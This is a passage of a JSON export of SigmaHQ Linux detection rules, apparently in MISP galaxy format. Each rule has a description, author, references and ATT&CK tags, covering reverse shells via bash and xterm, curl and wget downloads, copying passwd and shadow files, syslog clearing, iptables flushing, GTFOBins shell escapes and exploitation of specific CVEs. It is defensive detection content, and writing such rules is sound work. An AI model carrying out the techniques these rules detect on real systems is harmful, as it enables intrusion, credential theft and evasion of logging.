"https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml" ], "tags": [ "attack.impact", "attack.t1565.001" ] }, "related": [ { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "86157017-c2b1-4d4a-8c33-93b8e67e4af4", "value": "Potential Suspicious Change To Sensitive/Critical Files" }, { "description": "Detects execution of the bash shell with the interactive flag \"-i\".", "meta": { "author": "@d4ns4n_", "creation_date": "2023-04-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_bash_interactive_shell.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/bash", "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml" ], "tags": [ "attack.execution" ] }, "uuid": "6104e693-a7d6-4891-86cb-49a258523559", "value": "Bash Interactive Shell" }, { "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_lnx_base64_decode.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031", "value": "Decode Base64 Encoded Text" }, { "description": "Detects enumeration of local network configuration", "meta": { "author": "Ömer Günal and remotephone, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_system_network_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1016" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", "value": "System Network Discovery - Linux" }, { "description": "Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of \"uname\" or \"cat /proc/cpuinfo\"\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_grep_os_arch_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d27ab432-2199-483f-a297-03633c05bae6", "value": "OS Architecture Discovery Via Grep" }, { "description": "Detects usage of the \"usermod\" binary to add users add users to the root or suoders groups", "meta": { "author": "TuanLe (GTSC)", "creation_date": "2022-12-21", "falsepositive": [ "Legitimate administrator activities" ], "filename": "proc_creation_lnx_usermod_susp_group.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence" ] }, "uuid": "6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", "value": "User Added To Root/Sudoers Group Using Usermod" }, { "description": "Detects the usage of the unsafe bpftrace option", "meta": { "author": "Andreas Hunkeler (@Karneades)", "creation_date": "2022-02-11", "falsepositive": [ "Legitimate usage of the unsafe option" ], "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://bpftrace.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", "value": "BPFtrace Unsafe Option Usage" }, { "description": "Detects usage of \"xterm\" as a potential reverse shell tunnel", "meta": { "author": "@d4ns4n_", "creation_date": "2023-04-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_xterm_reverse_shell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e25af4b-246d-44ea-8563-e42aacab006b", "value": "Potential Xterm Reverse Shell" }, { "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_schedule_task_job_cron.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.privilege-escalation", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", "value": "Scheduled Cron Task/Job - Linux" }, { "description": "Detects usage of the \"touch\" process in service file.", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-01-11", "falsepositive": [ "Admin changing date of files." ], "filename": "proc_creation_lnx_touch_susp.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.006" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "31545105-3444-4584-bebf-c466353230d2", "value": "Touch Suspicious Service File" }, { "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_crontab_removal.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", "value": "Remove Scheduled Cron Task/Job" }, { "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" ], "tags": [ "attack.initial-access", "attack.execution", "attack.t1190", "attack.t1059", "cve.2022-26134" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", "value": "Atlassian Confluence CVE-2022-26134" }, { "description": "Detects execution of inline Python code via the \"-c\" in order to call the \"system\" function from the \"os\" library, and spawn a shell.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_python_shell_os_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/python/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_shell_os_system.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d2f44ff-4611-4778-a8fc-323a0e9850cc", "value": "Inline Python Execution - Spawn Shell Via OS System Library" }, { "description": "Detects execution of the \"esxcli\" command with the \"vm\" flag in order to retrieve information about the installed VMs.", "meta": { "author": "Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_vm_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html", "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html", "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/", "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1007" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f1573a7-363b-4114-9208-ad7a61de46eb", "value": "ESXi VM List Discovery Via ESXCLI" }, { "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Scripts created by developers and admins", "Administrative activity" ], "filename": "proc_creation_lnx_curl_usage.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", "value": "Curl Usage on Linux" }, { "description": "Detects changes to the ESXi syslog configuration via \"esxcli\"", "meta": { "author": "Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administrative activities" ], "filename": "proc_creation_lnx_esxcli_syslog_config_change.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US", "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.t1562.003" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8f504411-cb96-4dac-a537-8d2bb7679c59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "38eb1dbb-011f-40b1-a126-cf03a0210563", "value": "ESXi Syslog Configuration Change Via ESXCLI" }, { "description": "Detects execution of shells from a parent process located in a temporary (/tmp) directory", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml" ], "tags": [ "attack.execution" ] }, "uuid": "2fade0b6-7423-4835-9d4f-335b39b83867", "value": "Shell Execution Of Process Located In Tmp Directory" }, { "description": "Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_capa_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/diego-treitos/linux-smart-enumeration", "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/carlospolop/PEASS-ng", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d8d97d51-122d-4cdd-9e2f-01b4b4933530", "value": "Capabilities Discovery - Linux" }, { "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-05", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", "value": "Triple Cross eBPF Rootkit Execve Hijack" }, { "description": "Detects the use of wget to download content to a suspicious directory", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_wget_download_suspicious_directory.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cf610c15-ed71-46e1-bdf8-2bd1a99de6c4", "value": "Download File To Potentially Suspicious Directory Via Wget" }, { "description": "Detects the use of the \"ssh\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-08-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_ssh_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/ssh/", "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ssh_shell_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8737b7f6-8df3-4bb7-b1da-06019b99b687", "value": "Shell Invocation Via Ssh - Linux" }, { "description": "Detects the use of the \"gcc\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_rsync_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/rsync/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_rsync_shell_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2326866-609f-4015-aea9-7ec634e8aa04", "value": "Shell Execution via Rsync - Linux" }, { "description": "Detects execution of the \"esxcli\" command with the \"vm\" and \"kill\" flag in order to kill/shutdown a specific VM.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_vm_kill.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html", "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html", "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/", "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml" ], "tags": [ "attack.execution" ] }, "uuid": "2992ac4d-31e9-4325-99f2-b18a73221bb2", "value": "ESXi VM Kill Via ESXCLI" }, { "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-20", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", "https://github.com/apache/spark/pull/36315/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" ], "tags": [ "attack.initial-access", "attack.t1190", "cve.2022-33891" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", "value": "Apache Spark Shell Command Injection - ProcessCreation" }, { "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-15", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.openwall.com/lists/oss-security/2019/10/14/1", "https://twitter.com/matthieugarin/status/1183970598210412546", "https://access.redhat.com/security/cve/cve-2019-14287", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1068", "attack.t1548.003", "cve.2019-14287" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1365fe3b-0f50-455d-b4da-266ce31c23b0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", "value": "Sudo Privilege Escalation CVE-2019-14287" }, { "description": "Detects the use of the \"capsh\" utility to invoke a shell.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_capsh_shell_invocation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://gtfobins.github.io/gtfobins/capsh/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capsh_shell_invocation.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db1ac3be-f606-4e3a-89e0-9607cbe6b98a", "value": "Capsh Shell Invocation - Linux" }, { "description": "Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-01-18", "falsepositive": [ "Network administrators" ], "filename": "proc_creation_lnx_iptables_flush_ufw.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html", "https://blogs.blackberry.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3be619f4-d9ec-4ea8-a173-18fdd01996ab", "value": "Flush Iptables Ufw Chain" }, { "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", "meta": { "author": "Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Log rotation." ], "filename": "proc_creation_lnx_clear_syslog.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.002" ] }, "related": [ { "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", "value": "Commands to Clear or Remove the Syslog" }, { "description": "Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.", "meta": { "author": "Muhammad Faisal", "creation_date": "2023-08-03", "falsepositive": [ "Legitimate activity of system administrators" ], "filename": "proc_creation_lnx_ssm_agent_abuse.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan", "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/", "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml" ], "tags": [ "attack.command-and-control", "attack.persistence", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f9b3edc5-3322-4fc7-8aa3-245d646cc4b7", "value": "Potential Linux Amazon SSM Agent Hijacking" }, { "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-14", "falsepositive": [ "Legitimate software that uses these patterns" ], "filename": "proc_creation_lnx_susp_pipe_shell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "880973f3-9708-491c-a77b-2a35a1921158", "value": "Linux Shell Pipe to Shell" }, { "description": "Detects when the file \"passwd\" or \"shadow\" is copied from tmp path", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-01-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_cp_passwd_or_shadow_tmp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 